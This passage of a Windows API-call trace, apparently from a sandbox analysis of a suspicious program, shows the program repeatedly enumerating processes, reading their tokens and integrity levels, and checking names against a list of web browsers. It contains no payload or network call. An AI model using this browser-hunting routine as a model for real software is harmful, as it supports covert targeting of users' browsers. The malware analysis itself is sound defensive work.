dwProcessId=0x304) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0542.970] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0542.970] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0542.970] GetLastError () returned 0x7a [0542.970] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0542.970] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0542.970] CloseHandle (hObject=0x29c) returned 1 [0542.970] CloseHandle (hObject=0x298) returned 1 [0542.970] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0542.971] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0542.971] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0542.971] GetLastError () returned 0x7a [0542.971] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0542.971] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0542.971] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0542.971] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0542.971] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0542.971] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0542.972] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0542.972] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0542.972] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0542.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0542.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0542.972] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0542.972] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0542.972] GetLastError () returned 0x7a [0542.972] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0542.972] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0542.973] CloseHandle (hObject=0x29c) returned 1 [0542.973] CloseHandle (hObject=0x298) returned 1 [0542.973] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0542.973] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0542.973] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0542.973] GetLastError () returned 0x7a [0542.973] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0542.973] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0542.973] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0542.974] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0542.974] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0542.974] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0542.974] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0542.974] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0542.974] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0542.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0542.974] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0542.974] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0542.974] GetLastError () returned 0x7a [0542.974] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0542.975] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0542.975] CloseHandle (hObject=0x29c) returned 1 [0542.975] CloseHandle (hObject=0x298) returned 1 [0542.975] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0542.975] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0542.975] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0542.975] GetLastError () returned 0x7a [0542.975] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0542.976] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0542.976] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0542.976] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0542.976] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0542.976] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0542.976] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0542.976] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0542.976] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0542.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0542.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0542.976] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0542.977] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0542.977] GetLastError () returned 0x7a [0542.977] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0542.977] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0542.977] CloseHandle (hObject=0x29c) returned 1 [0542.977] CloseHandle (hObject=0x298) returned 1 [0542.977] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0542.977] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0542.978] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0542.978] GetLastError () returned 0x7a [0542.978] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0542.978] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0542.978] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0542.978] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0542.978] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0542.978] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0542.978] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0542.978] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0542.978] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0542.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0542.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0542.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0542.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0542.979] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0542.979] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0542.979] GetLastError () returned 0x7a [0542.979] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0542.979] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0542.980] CloseHandle (hObject=0x29c) returned 1 [0542.980] CloseHandle (hObject=0x298) returned 1 [0542.980] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0542.980] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0542.980] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0542.980] GetLastError () returned 0x7a [0542.980] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0542.980] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0542.980] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0542.981] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0542.981] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0542.981] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0542.981] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0542.981] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0542.981] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0542.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0542.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0542.981] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0542.982] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0544.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa408) returned 0xc0000004 [0544.994] VirtualAlloc (lpAddress=0x0, dwSize=0xb408, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0544.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb408, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0544.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0544.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0544.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0544.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0544.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0544.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0544.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0544.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0544.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0544.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0544.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0544.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0544.998] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0544.998] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0544.998] GetLastError () returned 0x7a [0544.998] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0544.998] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0544.998] CloseHandle (hObject=0x29c) returned 1 [0544.999] CloseHandle (hObject=0x298) returned 1 [0544.999] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0544.999] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0544.999] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0544.999] GetLastError () returned 0x7a [0544.999] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0544.999] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0544.999] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0545.000] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0545.000] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0545.000] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0545.000] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0545.000] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0545.000] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0545.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0545.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0545.000] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0545.000] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0545.000] GetLastError () returned 0x7a [0545.001] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0545.001] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0545.001] CloseHandle (hObject=0x29c) returned 1 [0545.001] CloseHandle (hObject=0x298) returned 1 [0545.001] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0545.001] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0545.001] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0545.001] GetLastError () returned 0x7a [0545.002] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0545.002] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0545.002] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0545.002] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0545.002] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0545.002] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0545.002] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0545.002] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0545.002] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0545.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0545.002] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0545.003] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0545.003] GetLastError () returned 0x7a [0545.003] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0545.003] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0545.003] CloseHandle (hObject=0x29c) returned 1 [0545.003] CloseHandle (hObject=0x298) returned 1 [0545.003] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0545.003] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0545.004] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0545.004] GetLastError () returned 0x7a [0545.004] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0545.004] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0545.004] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0545.004] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0545.004] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0545.004] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0545.004] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0545.004] 